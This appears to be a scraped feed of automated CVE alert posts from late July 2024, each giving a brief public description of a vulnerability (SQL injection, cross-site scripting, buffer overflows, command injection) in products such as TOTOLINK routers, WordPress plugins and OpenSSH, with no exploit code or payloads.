| 2024-07-29 16:37:26 |
🚨 CVE-2024-40576Cross Site Scripting vulnerability in Best House Rental Management System 1.0 allows a remote attacker to execute arbitrary code via the "House No" and "Description" parameters in the houses page at the index.php component.🎖@cveNotify |
|
| 2024-07-29 16:37:25 |
🚨 CVE-2024-4005The Social Pixel WordPress plugin through 2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-07-29 15:37:25 |
🚨 CVE-2024-37906Admidio is a free, open source user management system for websites of organizations and groups. In Admidio before version 4.3.9, there is an SQL Injection in the `/adm_program/modules/ecards/ecard_send.php` source file of the Admidio Application. The SQL Injection results in a compromise of the application's database. The value of `ecard_recipients `POST parameter is being directly concatenated with the SQL query in the source code causing the SQL Injection. The SQL Injection can be exploited by a member user, using blind condition-based, time-based, and Out of band interaction SQL Injection payloads. This vulnerability is fixed in 4.3.9.🎖@cveNotify |
|
| 2024-07-29 15:37:24 |
🚨 CVE-2024-33901Issue in KeePassXC 2.7.7 allows an attacker (who has the privileges of the victim) to recover some passwords stored in the .kdbx database via a memory dump. NOTE: the vendor disputes this because memory-management constraints make this unavoidable in the current design and other realistic designs.🎖@cveNotify |
|
| 2024-07-29 14:37:43 |
🚨 CVE-2024-41374ICEcoder 8.1 is vulnerable to Cross Site Scripting (XSS) via lib/settings-screen.php🎖@cveNotify |
|
| 2024-07-29 14:37:42 |
🚨 CVE-2024-41353phpipam 1.6 is vulnerable to Cross Site Scripting (XSS) via app\admin\groups\edit-group.php🎖@cveNotify |
|
| 2024-07-29 14:37:38 |
🚨 CVE-2024-27357An issue was discovered in WithSecure Elements Agent through 23.x for macOS, WithSecure Elements Client Security through 23.x for macOS, and WithSecure MDR through 23.x for macOS. Local Privilege Escalation can occur during installations or updates by admins.🎖@cveNotify |
|
| 2024-07-29 14:37:37 |
🚨 CVE-2024-24257An issue in skteco.com Central Control Attendance Machine web management platform v.3.0 allows an attacker to obtain sensitive information via a crafted script to the csl/user component.🎖@cveNotify |
|
| 2024-07-29 14:37:36 |
🚨 CVE-2023-50700Insecure Permissions vulnerability in Deepin dde-file-manager 6.0.54 and earlier allows privileged operations to be called by unprivileged users via the D-Bus method.🎖@cveNotify |
|
| 2024-07-29 14:37:32 |
🚨 CVE-2024-41356phpipam 1.6 is vulnerable to Cross Site Scripting (XSS) via app\admin\firewall-zones\zones-edit-network.php.🎖@cveNotify |
|
| 2024-07-29 14:37:31 |
🚨 CVE-2024-41805Tracks, a Getting Things Done (GTD) web application, is vulnerable to reflected cross-site scripting in versions prior to 2.7.1. Reflected cross-site scripting enables execution of malicious JavaScript in the context of a user’s browser if that user clicks on a malicious link, allowing phishing attacks that could lead to credential theft. Tracks version 2.7.1 is patched. No known complete workarounds are available.🎖@cveNotify |
|
| 2024-07-29 14:37:26 |
🚨 CVE-2024-7128A flaw was found in the Openshift console. Several endpoints in the application use the authHandler() and authHandlerWithUser() middleware functions. When the default authentication provider ("openShiftAuth") is set, these functions do not perform any authentication checks, relying instead on the targeted service to handle authentication and authorization. This issue leads to various degrees of data exposure due to a lack of proper credential verification.🎖@cveNotify |
|
| 2024-07-29 14:37:25 |
🚨 CVE-2024-41692This vulnerability exists in SyroTech SY-GPON-1110-WDONT Router due to presence of root terminal access on a serial interface without proper access control. An attacker with physical access could exploit this by accessing the root shell on the vulnerable system.Successful exploitation of this vulnerability could allow the attacker to execute arbitrary commands with root privileges on the targeted system.🎖@cveNotify |
|
| 2024-07-29 12:37:25 |
🚨 CVE-2024-7198A vulnerability classified as critical has been found in SourceCodester Complaints Report Management System 1.0. This affects an unknown part of the file /admin/manage_station.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272619.🎖@cveNotify |
|
| 2024-07-29 12:37:24 |
🚨 CVE-2024-7197A vulnerability was found in SourceCodester Complaints Report Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/manage_complaint.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-272618 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-29 10:37:25 |
🚨 CVE-2024-7194A vulnerability was found in itsourcecode Society Management System 1.0 and classified as critical. This issue affects some unknown processing of the file check_student.php. The manipulation of the argument student_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272615.🎖@cveNotify |
|
| 2024-07-29 10:37:24 |
🚨 CVE-2024-7193A vulnerability has been found in Mp3tag up to 3.26d and classified as problematic. This vulnerability affects unknown code in the library tak_deco_lib.dll of the component DLL Handler. The manipulation leads to uncontrolled search path. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. Upgrading to version 3.26e is able to address this issue. It is recommended to upgrade the affected component. VDB-272614 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early, responded in a very professional manner and immediately released a fixed version of the affected product.🎖@cveNotify |
|
| 2024-07-29 09:37:30 |
🚨 CVE-2024-41881SDoP versions prior to 1.11 fails to handle appropriately some parameters inside the input data, resulting in a stack-based buffer overflow vulnerability. When a user of the affected product is tricked to process a specially crafted XML file, arbitrary code may be executed on the user's environment.🎖@cveNotify |
|
| 2024-07-29 09:37:26 |
🚨 CVE-2024-41143Origin validation error vulnerability exists in SKYSEA Client View Ver.3.013.00 to Ver.19.210.04e. If this vulnerability is exploited, an arbitrary process may be executed with SYSTEM privilege by a user who can log in to the PC where the product's Windows client is installed.🎖@cveNotify |
|
| 2024-07-29 09:37:25 |
🚨 CVE-2024-6387A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.🎖@cveNotify |
|
| 2024-07-29 09:37:24 |
🚨 CVE-2024-26621In the Linux kernel, the following vulnerability has been resolved:mm: huge_memory: don't force huge page alignment on 32 bitcommit efa7df3e3bb5 ("mm: align larger anonymous mappings on THPboundaries") caused two issues [1] [2] reported on 32 bit system or compatuserspace.It doesn't make too much sense to force huge page alignment on 32 bitsystem due to the constrained virtual address space.[1] https://lore.kernel.org/linux-mm/d0a136a0-4a31-46bc-adf4-2db109a61672@kernel.org/[2] https://lore.kernel.org/linux-mm/CAJuCfpHXLdQy1a2B6xN2d7quTYwg2OoZseYPZTRpU0eHHKD-sQ@mail.gmail.com/🎖@cveNotify |
|
| 2024-07-29 08:37:25 |
🚨 CVE-2024-7190A vulnerability classified as critical was found in itsourcecode Society Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/get_price.php. The manipulation of the argument expenses_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272611.🎖@cveNotify |
|
| 2024-07-29 08:37:24 |
🚨 CVE-2024-7189A vulnerability classified as critical has been found in itsourcecode Online Food Ordering System 1.0. Affected is an unknown function of the file editproduct.php. The manipulation of the argument photo leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-272610 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-29 06:37:38 |
🚨 CVE-2024-7186A vulnerability was found in TOTOLINK A3600R 4.1.2cu.5182_B20201102. It has been classified as critical. This affects the function setWiFiAclAddConfig of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument comment leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272607. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-29 06:37:31 |
🚨 CVE-2024-6366The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.🎖@cveNotify |
|
| 2024-07-29 06:37:30 |
🚨 CVE-2024-5883The Ultimate Classified Listings WordPress plugin before 1.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-07-29 06:37:26 |
🚨 CVE-2024-5285The wp-affiliate-platform WordPress plugin before 6.5.2 does not have CSRF check in place when deleting affiliates, which could allow attackers to make a logged in user change delete them via a CSRF attack🎖@cveNotify |
|
| 2024-07-29 06:37:25 |
🚨 CVE-2024-41637RaspAP before 3.1.5 allows an attacker to escalate privileges: the www-data user has write access to the restapi.service file and also possesses Sudo privileges to execute several critical commands without a password.🎖@cveNotify |
|
| 2024-07-29 06:37:24 |
🚨 CVE-2024-37381An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2024 flat allows an authenticated attacker within the same network to execute arbitrary code.🎖@cveNotify |
|
| 2024-07-29 05:37:25 |
🚨 CVE-2024-7184A vulnerability has been found in TOTOLINK A3600R 4.1.2cu.5182_B20201102 and classified as critical. Affected by this vulnerability is the function setUrlFilterRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument url leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272605 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-29 05:37:24 |
🚨 CVE-2024-7183A vulnerability, which was classified as critical, was found in TOTOLINK A3600R 4.1.2cu.5182_B20201102. Affected is the function setUploadSetting of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument FileName leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272604. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-29 04:37:32 |
🚨 CVE-2024-7182A vulnerability, which was classified as critical, has been found in TOTOLINK A3600R 4.1.2cu.5182_B20201102. This issue affects the function setUpgradeFW of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument FileName leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272603. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-29 04:37:31 |
🚨 CVE-2024-7181A vulnerability classified as critical was found in TOTOLINK A3600R 4.1.2cu.5182_B20201102. This vulnerability affects the function setTelnetCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument telnet_enabled leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-272602 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-29 03:37:29 |
🚨 CVE-2024-7201The login functionality of WinMatrix3 Web package from Simopro Technology lacks proper validation of user input, allowing unauthenticated remote attackers to inject SQL commands to read, modify, and delete database contents.🎖@cveNotify |
|
| 2024-07-29 03:37:26 |
🚨 CVE-2024-7180A vulnerability classified as critical has been found in TOTOLINK A3600R 4.1.2cu.5182_B20201102. This affects the function setPortForwardRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument comment leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272601 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-29 03:37:25 |
🚨 CVE-2024-5670The web services of Softnext's products, Mail SQR Expert and Mail Archiving Expert do not properly validate user input, allowing unauthenticated remote attackers to inject arbitrary OS commands and execute them on the remote server.🎖@cveNotify |
|
| 2024-07-29 03:37:24 |
🚨 CVE-2024-32671Heap-based Buffer Overflow vulnerability in Samsung Open Source Escargot JavaScript engine allows Overflow Buffers.This issue affects Escargot: 4.0.0.🎖@cveNotify |
|
| 2024-07-29 02:37:25 |
🚨 CVE-2024-7177A vulnerability was found in TOTOLINK A3600R 4.1.2cu.5182_B20201102. It has been classified as critical. Affected is the function setLanguageCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument langType leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-272598 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-29 02:37:24 |
🚨 CVE-2024-7176A vulnerability was found in TOTOLINK A3600R 4.1.2cu.5182_B20201102 and classified as critical. This issue affects the function setIpQosRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument comment leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272597 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-29 01:37:25 |
🚨 CVE-2024-7175A vulnerability has been found in TOTOLINK A3600R 4.1.2cu.5182_B20201102 and classified as critical. This vulnerability affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ipDoamin leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272596. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-29 01:37:24 |
🚨 CVE-2006-5051Signal handler race condition in OpenSSH before 4.4 allows remote attackers to cause a denial of service (crash), and possibly execute arbitrary code if GSSAPI authentication is enabled, via unspecified vectors that lead to a double-free.🎖@cveNotify |
|
| 2024-07-29 00:37:25 |
🚨 CVE-2024-7173A vulnerability, which was classified as critical, has been found in TOTOLINK A3600R 4.1.2cu.5182_B20201102. Affected by this issue is the function loginauth of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument password/http_host leads to buffer overflow. The attack may be launched remotely. VDB-272594 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-28 23:37:25 |
🚨 CVE-2024-7172A vulnerability classified as critical was found in TOTOLINK A3600R 4.1.2cu.5182_B20201102. Affected by this vulnerability is the function getSaveConfig of the file /cgi-bin/cstecgi.cgi?action=save&setting. The manipulation of the argument http_host leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272593 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-28 23:37:24 |
🚨 CVE-2024-7171A vulnerability classified as critical has been found in TOTOLINK A3600R 4.1.2cu.5182_B20201102. Affected is the function NTPSyncWithHost of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument hostTime leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272592. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-28 22:37:24 |
🚨 CVE-2024-7170A vulnerability was found in TOTOLINK A3000RU 5.9c.5185. It has been rated as problematic. This issue affects some unknown processing of the file /web_cste/cgi-bin/product.ini. The manipulation leads to use of hard-coded password. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272591. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-28 21:37:25 |
🚨 CVE-2024-6387A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.🎖@cveNotify |
|
| 2024-07-28 21:37:24 |
🚨 CVE-2006-5051Signal handler race condition in OpenSSH before 4.4 allows remote attackers to cause a denial of service (crash), and possibly execute arbitrary code if GSSAPI authentication is enabled, via unspecified vectors that lead to a double-free.🎖@cveNotify |
|
| 2024-07-28 20:37:24 |
🚨 CVE-2024-7169A vulnerability classified as problematic has been found in SourceCodester School Fees Payment System 1.0. This affects an unknown part of the file /ajax.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272583.🎖@cveNotify |
|
| 2024-07-28 19:37:25 |
🚨 CVE-2024-7168A vulnerability was found in SourceCodester School Fees Payment System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /manage_user.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-272582 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-28 19:37:24 |
🚨 CVE-2024-7167A vulnerability was found in SourceCodester School Fees Payment System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /manage_course.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272581 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-28 18:37:25 |
🚨 CVE-2024-7166A vulnerability was found in SourceCodester School Fees Payment System 1.0. It has been classified as critical. Affected is an unknown function of the file /receipt.php. The manipulation of the argument ef_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272580.🎖@cveNotify |
|
| 2024-07-28 18:37:24 |
🚨 CVE-2024-7165A vulnerability was found in SourceCodester School Fees Payment System 1.0 and classified as critical. This issue affects some unknown processing of the file /view_payment.php. The manipulation of the argument ef_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272579.🎖@cveNotify |
|
| 2024-07-28 17:37:25 |
🚨 CVE-2024-7164A vulnerability has been found in SourceCodester School Fees Payment System 1.0 and classified as critical. This vulnerability affects unknown code of the file /ajax.php?action=login. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-272578 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-28 17:37:24 |
🚨 CVE-2024-7163A vulnerability, which was classified as problematic, was found in SeaCMS 12.9. This affects an unknown part of the file /js/player/dmplayer/player/index.php. The manipulation of the argument color/vid/url leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272577 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-28 16:37:25 |
🚨 CVE-2024-7162A vulnerability, which was classified as problematic, has been found in SeaCMS 12.9/13.0. Affected by this issue is some unknown functionality of the file js/player/dmplayer/admin/post.php?act=setting. The manipulation of the argument yzm leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272576.🎖@cveNotify |
|
| 2024-07-28 16:37:24 |
🚨 CVE-2024-7161A vulnerability classified as problematic was found in SeaCMS 13.0. Affected by this vulnerability is an unknown functionality of the file /member.php?action=chgpwdsubmit of the component Password Change Handler. The manipulation of the argument newpwd/newpwd2 leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272575.🎖@cveNotify |
|
| 2024-07-28 15:37:25 |
🚨 CVE-2024-7160A vulnerability classified as critical has been found in TOTOLINK A3700R 9.1.2u.5822_B20200513. Affected is the function setWanCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument hostName leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-272574 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-28 15:37:24 |
🚨 CVE-2024-7159A vulnerability was found in TOTOLINK A3600R 4.1.2cu.5182_B20201102. It has been rated as critical. This issue affects some unknown processing of the file /web_cste/cgi-bin/product.ini of the component Telnet Service. The manipulation leads to use of hard-coded password. The exploit has been disclosed to the public and may be used. The identifier VDB-272573 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-28 14:37:30 |
🚨 CVE-2024-40897Stack-based buffer overflow vulnerability exists in orcparse.c of ORC versions prior to 0.4.39. If a developer is tricked to process a specially crafted file with the affected ORC compiler, an arbitrary code may be executed on the developer's build environment. This may lead to compromise of developer machines or CI build environments.🎖@cveNotify |
|
| 2024-07-28 14:37:26 |
🚨 CVE-2024-4032The “ipaddress” module contained incorrect information about whether certain IPv4 and IPv6 addresses were designated as “globally reachable” or “private”. This affected the is_private and is_global properties of the ipaddress.IPv4Address, ipaddress.IPv4Network, ipaddress.IPv6Address, and ipaddress.IPv6Network classes, where values wouldn’t be returned in accordance with the latest information from the IANA Special-Purpose Address Registries.CPython 3.12.4 and 3.13.0a6 contain updated information from these registries and thus have the intended behavior.🎖@cveNotify |
|
| 2024-07-28 14:37:25 |
🚨 CVE-2024-5458In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, due to a code logic error, filtering functions such as filter_var when validating URLs (FILTER_VALIDATE_URL) for certain types of URLs the function will result in invalid user information (username + password part of URLs) being treated as valid user information. This may lead to the downstream code accepting invalid URLs as valid and parsing them incorrectly.🎖@cveNotify |
|
| 2024-07-28 14:37:24 |
🚨 CVE-2018-14335An issue was discovered in H2 1.4.197. Insecure handling of permissions in the backup function allows attackers to read sensitive files (outside of their permissions) via a symlink to a fake database file.🎖@cveNotify |
|
| 2024-07-28 11:37:25 |
🚨 CVE-2024-7157A vulnerability was found in TOTOLINK A3100R 4.1.2cu.5050_B20200504. It has been classified as critical. This affects the function getSaveConfig of the file /cgi-bin/cstecgi.cgi?action=save&setting. The manipulation of the argument http_host leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272571. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-28 11:37:24 |
🚨 CVE-2024-7156A vulnerability was found in TOTOLINK A3700R 9.1.2u.5822_B20200513 and classified as problematic. Affected by this issue is some unknown functionality of the file /cgi-bin/ExportSettings.sh of the component apmib Configuration Handler. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-272570 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-28 10:37:25 |
🚨 CVE-2024-7155A vulnerability has been found in TOTOLINK A3300R 17.0.0cu.557_B20221024 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /etc/shadow.sample. The manipulation leads to use of hard-coded password. It is possible to launch the attack on the local host. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-272569 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-28 10:37:24 |
🚨 CVE-2024-7154A vulnerability, which was classified as problematic, was found in TOTOLINK A3700R 9.1.2u.5822_B20200513. Affected is an unknown function of the file /wizard.html of the component Password Reset Handler. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272568. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-28 08:37:24 |
🚨 CVE-2024-3768A vulnerability, which was classified as critical, has been found in PHPGurukul/itsourcecode News Portal 4.1. This issue affects some unknown processing of the file search.php. The manipulation of the argument searchtitle leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-260615.🎖@cveNotify |
|
| 2024-07-28 04:37:24 |
🚨 CVE-2024-42054Cervantes through 0.5-alpha accepts insecure file uploads.🎖@cveNotify |
|
| 2024-07-28 03:37:25 |
🚨 CVE-2024-42051The MSI installer for Splashtop Streamer for Windows before 3.6.2.0 uses a temporary folder with weak permissions during installation. A local user can exploit this to escalate privileges to SYSTEM by replacing InstRegExp.reg.🎖@cveNotify |
|
| 2024-07-28 03:37:24 |
🚨 CVE-2024-42050The MSI installer for Splashtop Streamer for Windows before 3.7.0.0 uses a temporary folder with weak permissions during installation. A local user can exploit this to escalate privileges to SYSTEM via an oplock on CredProvider_Inst.reg.🎖@cveNotify |
|
| 2024-07-28 02:37:24 |
🚨 CVE-2024-42049TightVNC (Server for Windows) before 2.8.84 allows attackers to connect to the control pipe via a network connection.🎖@cveNotify |
|
| 2024-07-27 22:37:24 |
🚨 CVE-2024-7153A vulnerability classified as problematic has been found in Netgear WN604 up to 20240719. Affected is an unknown function of the file siteSurvey.php. The manipulation leads to direct request. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272556. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-27 21:37:24 |
🚨 CVE-2024-7152A vulnerability was found in Tenda O3 1.0.0.10(2478). It has been rated as critical. This issue affects the function fromSafeSetMacFilter of the file /goform/setMacFilterList. The manipulation of the argument time leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272555. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-27 20:37:24 |
🚨 CVE-2024-7151A vulnerability was found in Tenda O3 1.0.0.10(2478). It has been declared as critical. This vulnerability affects the function fromMacFilterSet of the file /goform/setMacFilter. The manipulation of the argument remark leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-272554 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-27 13:37:24 |
🚨 CVE-2024-6703The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘description’ and 'btn_txt' parameters in all versions up to, and including, 5.1.19 due to insufficient input sanitization and output escaping. This makes it possible for attackers with the Form Manager permissions and Subscriber+ user role, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-27 12:37:29 |
🚨 CVE-2024-6897The aThemes Starter Sites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.53 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.🎖@cveNotify |
|
| 2024-07-27 12:37:26 |
🚨 CVE-2024-6627The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's PDF View widget in all versions up to, and including, 3.11.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-27 12:37:25 |
🚨 CVE-2024-6518The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.1.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-27 12:37:24 |
🚨 CVE-2024-5614The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.4.29 via the 'pafe_posts_list' function. This makes it possible for unauthenticated attackers to extract sensitive data including titles and excerpts of future, draft, and pending blog posts.🎖@cveNotify |
|
| 2024-07-27 09:37:25 |
🚨 CVE-2024-6569The Campaign Monitor for WordPress plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.8.15. This is due the plugin not properly restricting direct access to /forms/views/admin/create.php and display_errors being enabled. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.🎖@cveNotify |
|
| 2024-07-27 09:37:24 |
🚨 CVE-2024-6458The WooCommerce Product Table Lite plugin for WordPress is vulnerable to unauthorized post title modification due to a missing capability check on the wcpt_presets__duplicate_preset_to_table function in all versions up to, and including, 3.5.1. This makes it possible for authenticated attackers with subscriber access and above to change titles of arbitrary posts. Missing sanitization can lead to Stored Cross-Site Scripting when viewed by an admin via the WooCommerce Product Table.🎖@cveNotify |
|
| 2024-07-27 08:48:19 |
None |
|
| 2024-07-27 08:37:24 |
🚨 CVE-2024-5969The AIomatic - Automatic AI Content Writer for WordPress is vulnerable to arbitrary email sending vulnerability in versions up to, and including, 2.0.5. This is due to insufficient limitations on the email recipient and the content in the 'aiomatic_send_email' function which are reachable via AJAX. This makes it possible for unauthenticated attackers to send emails with any content to any recipient.🎖@cveNotify |
|
| 2024-07-27 04:37:24 |
🚨 CVE-2024-42029xdg-desktop-portal-hyprland (aka an XDG Desktop Portal backend for Hyprland) before 1.3.3 allows OS command execution, e.g., because single quotes are not used when sending a list of app IDs and titles via the environment.🎖@cveNotify |
|
| 2024-07-27 02:37:32 |
🚨 CVE-2024-6545The Admin Trim Interface plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.5.1. This is due to the plugin utilizing bootstrap and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.🎖@cveNotify |
|
| 2024-07-27 02:37:26 |
🚨 CVE-2024-6431The Media.net Ads Manager plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and missing capability check in the 'sendMail' function in all versions up to, and including, 2.10.13. This makes it possible for authenticated attackers, with subscriber-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible. The vulnerability is only exploitable if anyone has ever logged in through the API.🎖@cveNotify |
|
| 2024-07-27 02:37:25 |
